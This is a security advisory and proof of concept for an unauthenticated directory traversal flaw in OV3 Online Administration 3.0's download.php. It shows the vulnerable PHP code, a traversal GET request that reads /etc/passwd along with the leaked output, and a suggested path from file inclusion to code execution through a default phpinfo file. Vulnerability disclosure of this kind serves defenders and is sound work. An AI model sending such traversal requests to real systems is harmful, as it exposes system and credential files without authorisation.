OV3 Online Administration 3.0 Parameter Traversal Arbitrary File Access

2017-05-31T00:00:00
ID PACKETSTORM:142748
Type packetstorm
Reporter LiquidWorm
Modified 2017-05-31T00:00:00

Description

                                        
                                            `  
OV3 Online Administration 3.0 Parameter Traversal Arbitrary File Access PoC Exploit  
  
  
Vendor: novaCapta Software & Consulting GmbH  
Product web page: http://www.meacon.de  
Affected version: 3.0  
  
Summary: With the decision to use the OV3 as a platform for your data management,  
the course is set for scalable, flexible and high-performance applications. Whether  
you use the OV3 for your internal data management or use it for commercial business  
applications such as shops, portals, etc. Thanks to the data-based structure of the  
OV3, you always have the best tool at your fingertips. The OV3 is a 100% web-based  
tool. This eliminates the need to install a new software on all participating client  
computers. All elements are operated by a standard browser. Further advantages are  
the location-dependent use and - particularly with ASP solutions - the reduced costs  
for local hardware like own servers and modern client workstations.  
  
Desc: The application (Online Verwaltung III) suffers from an unauthenticated file  
disclosure vulnerability when input passed thru the 'file' parameter to 'download.php'  
script is not properly verified before being used to include files. This can be exploited  
to read arbitrary files from local resources with directory traversal attacks.  
  
================================================================================  
/download.php:  
--------------  
  
67: header("Expires: Mon, 1 Apr 1990 00:00:00 GMT");  
68: header("Last-Modified: " . gmdate("D,d M YH:i:s") . " GMT");  
69: /*  
70: header("Cache-Control: no-cache, must-revalidate");  
71: header("Pragma: no-cache");  
72: */  
73: header("Pragma: ");   
74: header("Cache-Control: ");  
75: header("Content-type: application/octet-stream");  
76: header("Content-Type: application/force-download");  
77: $dname = rawurlencode($name);  
78: header("Content-Disposition: attachment; filename=\"$dname\";");  
79:  
80: if ($export==1) {  
81: if (is_file($path.'/'.$file)) {  
82: header('Content-Length: '.filesize($path.'/'.$file));  
83: readfile($path.'/'.$file);  
84: } elseif (is_file(utf8_decode($path.'/'.$file))) {  
85: header('Content-Length: '.filesize(utf8_decode($path.'/'.$file)));  
86: readfile(utf8_decode($path.'/'.$file));  
87: }  
88: }  
  
================================================================================  
  
Tested on: CentOS release 6.8 (Final)  
PHP/5.3.3  
Apache/2.2.15  
MySQL/5.0.11  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2017-5410  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5410.php  
  
  
26.12.2016  
  
---  
  
  
GET /download.php?c_id=557&file=../../../../../../../../../../../etc/passwd&name=download.txt HTTP/1.1  
Host: 127.0.0.1  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: ZSL/3.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Encoding: gzip, deflate, sdch  
Accept-Language: en-US,en;q=0.8  
DNT: 1  
Connection: close  
  
--  
  
HTTP/1.1 200 OK  
Date: Tue, 27 Dec 2016 12:24:10 GMT  
Server: Apache/2.2.15 (CentOS)  
X-Powered-By: PHP/5.3.3  
Expires: Mon, 1 Apr 1990 00:00:00 GMT  
Last-Modified: Tue,27 Dec 201612:24:10 GMT  
Pragma:   
Cache-Control:   
Content-Disposition: attachment; filename="download.txt";  
Content-Length: 0  
Connection: close  
Content-Type: application/force-download  
  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
...  
...  
  
  
  
The application ships with a phpinfo() file "m_info.php" by default in the web root directory:  
  
http://127.0.0.1/m_info.php  
  
Possibly exploitable for code execution using the PHP LFI to RCE method by Gynvael Coldwind,  
extended by Brett Moore:  
  
- http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf  
- https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf  
  
`